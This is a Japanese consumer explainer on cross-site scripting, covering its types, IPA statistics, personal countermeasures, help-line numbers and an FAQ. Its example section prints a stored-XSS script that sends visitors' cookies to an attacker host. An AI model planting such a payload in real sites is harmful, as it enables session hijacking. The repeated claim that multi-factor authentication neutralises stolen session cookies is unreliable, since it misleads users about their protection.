- クロスサイトスクリプティング(XSS)とは、Webサイトの脆弱性を突いて不正なスクリプトを埋め込み、そのサイトを閲覧したユーザーのブラウザ上でスクリプトを実行させる攻撃だ。
- 信頼している正規のサイトを閲覧しただけで、CookieやセッションIDが盗まれ、SNSアカウントの乗っ取りやネットバンキングへの不正ログインに使われてしまう。
- 仕組みを知っておけば、不審なサイトだけでなく正規サイトでも被害が起きうると分かり、多要素認証の重要性が実感できる。
【深掘り】これだけは知っておけ
クロスサイトスクリプティング(XSS:Cross-Site Scripting)は、WebアプリケーションにHTMLやJavaScriptを注入できる脆弱性を悪用し、そのサイトを閲覧したユーザーのブラウザ上で不正なスクリプトを動かす攻撃です。IPAの統計では、Webサイトの脆弱性届出のうち累計57%をXSSが占めており、例年最も多い脆弱性として報告されています。主な被害はCookieやセッションIDの窃取によるなりすましログイン、偽のログイン画面への誘導、Webページの改ざん、マルウェアの配布です。
XSSには主に三種類あります。反射型XSSは、攻撃者が仕込んだリンクをクリックさせて実行させるタイプです。格納型XSS(持続型XSS)は、掲示板やコメント欄など書き込みができる部分にスクリプトを埋め込み、そのページを閲覧した全ユーザーに影響が及ぶタイプで被害が広範囲になります。DOM-based XSSはブラウザ側のDOM操作を狙ったタイプです。格納型では一度スクリプトが埋め込まれると、管理者が発見して削除するまでサイト訪問者全員が被害を受け続けます。
個人ができる対策は、多要素認証の設定・ブラウザとOSの最新化・信頼できないリンクをクリックしないことです。特に、SNSや掲示板の書き込みから来るリンクは、XSS攻撃の踏み台となるページへ誘導している可能性があります。ブラウザのセキュリティ設定でContentSecurityPolicyに対応したサイトを優先利用することも有効です。
XSSの主な種類と特徴
| 種類 | 仕組み | 被害の範囲 |
|---|---|---|
| 反射型XSS | 攻撃者のリンクをクリックしたユーザーのみに影響 | クリックした人だけ被害 |
| 格納型XSS | スクリプトがサイト内に埋め込まれ全訪問者に影響 | サイト訪問者全員が被害を受け続ける |
| DOM-based XSS | ブラウザ側のDOM操作を悪用して実行 | サーバーへのリクエストなしに発動 |
典型的なフレーズ・文脈
(掲示板の投稿欄に書き込む)<script>document.location=’https://attacker.com/steal?c=’+document.cookie;</script>(このページを見た全ユーザーのCookieが外部サーバーへ送信される)
格納型XSSの典型例です。掲示板などにこのような投稿をするだけで、以降そのページを閲覧した全ユーザーのCookieが攻撃者のサーバーへ送信され続けます。
IPAは、Webサイトの脆弱性届出の半数以上をクロスサイトスクリプティングが占めるとして、多要素認証の設定とブラウザの最新化による対策を呼びかけています。
XSSの脅威を解説する報道番組や、IPAの注意喚起を想定した表現です。
Cookieが盗まれてもパスワード単独では入れないよう、多要素認証を設定しておくことがXSS対策の核心です。ブラウザを最新に保つことも重要。03-5978-7509へ。
IPA担当者が、XSS被害への最も有効な個人対策として多要素認証の重要性を助言する場面を想定しています。
困ったときの相談窓口
XSSによりアカウントを乗っ取られた場合などは、以下の窓口に相談できます。
| 窓口名 | 電話番号 | 受付時間 | 対応内容 |
|---|---|---|---|
| IPA安心相談窓口 | 03-5978-7509 | 平日 10:00〜12:00、13:30〜17:00 | 不正アクセス・Webサイト被害の相談 |
| 警察相談専用電話 | #9110 | 平日 8:30〜17:15(各都道府県で異なる) | 不正アクセス・アカウント乗っ取りの相談 |
| 消費者ホットライン | 188 | 地域の窓口に準ずる | 被害全般の相談 |
【まとめ】3つのポイント
- 正体は正規サイトを踏み台にした利用者攻撃:XSSは正規サイトにスクリプトを仕込み、閲覧者のブラウザを標的にします。
- Webサイト脆弱性届出の半数以上:IPAの統計でXSSは累計57%を占め、例年最も多い脆弱性です。
- 多要素認証でCookie盗取の被害を最小化:Cookieが盗まれてもパスワード単独では入れない設定が最も有効です。
よくある質問
-
Q信頼しているサイトを見ただけで被害に遭うことはありますか?
-
A
あります。格納型XSSでは、脆弱性のある正規サイトに攻撃者がスクリプトを埋め込んでいれば、そのページを閲覧しただけで被害が発生します。また、正規サイトがXSSを悪用して改ざんされていれば、ユーザーには正規サイトを閲覧しているように見えたまま被害を受けます。信頼できるサイトでも多要素認証を設定しておくことが重要な理由の一つです。
-
QSNSアカウントが乗っ取られました。XSSが原因の可能性はありますか?
-
A
可能性はあります。XSSによるCookieやセッションID窃取は、アカウント乗っ取りの典型的な手法の一つです。まずアカウントのパスワードを変更し、全端末からログアウトしてください。その後、多要素認証を有効にし、同じパスワードを使っている他サービスのパスワードも変更してください。SNSの運営会社にも不正アクセスを報告し、不審な投稿の削除を依頼してください。
-
QCookieが盗まれると具体的にどんな被害が起きますか?
-
A
Cookieにはログイン状態を維持するためのセッションIDが含まれています。これが盗まれると、攻撃者はパスワードを知らなくてもあなたのアカウントにログインできる状態になります。SNS・ネットバンキング・ECサイトなど、ログイン状態で利用しているサービスが乗っ取られ、なりすまし投稿・不正送金・不正注文などに悪用されます。多要素認証はこの被害を防ぐ最も有効な対策です。
-
Qクロスサイトスクリプティングとクロスサイトリクエストフォージェリの違いは何ですか?
-
A
攻撃の方向が違います。XSSはWebサイトに不正スクリプトを仕込み、閲覧者のブラウザで実行させることで情報を盗みます。CSRFはユーザーがログインした状態を悪用し、意図しないリクエストをサーバーへ送信させます。XSSはユーザーの情報を盗む、CSRFはユーザーの権限で勝手な操作をさせるという違いがあります。どちらも多要素認証と安全なブラウザの使用で被害を軽減できます。
コメント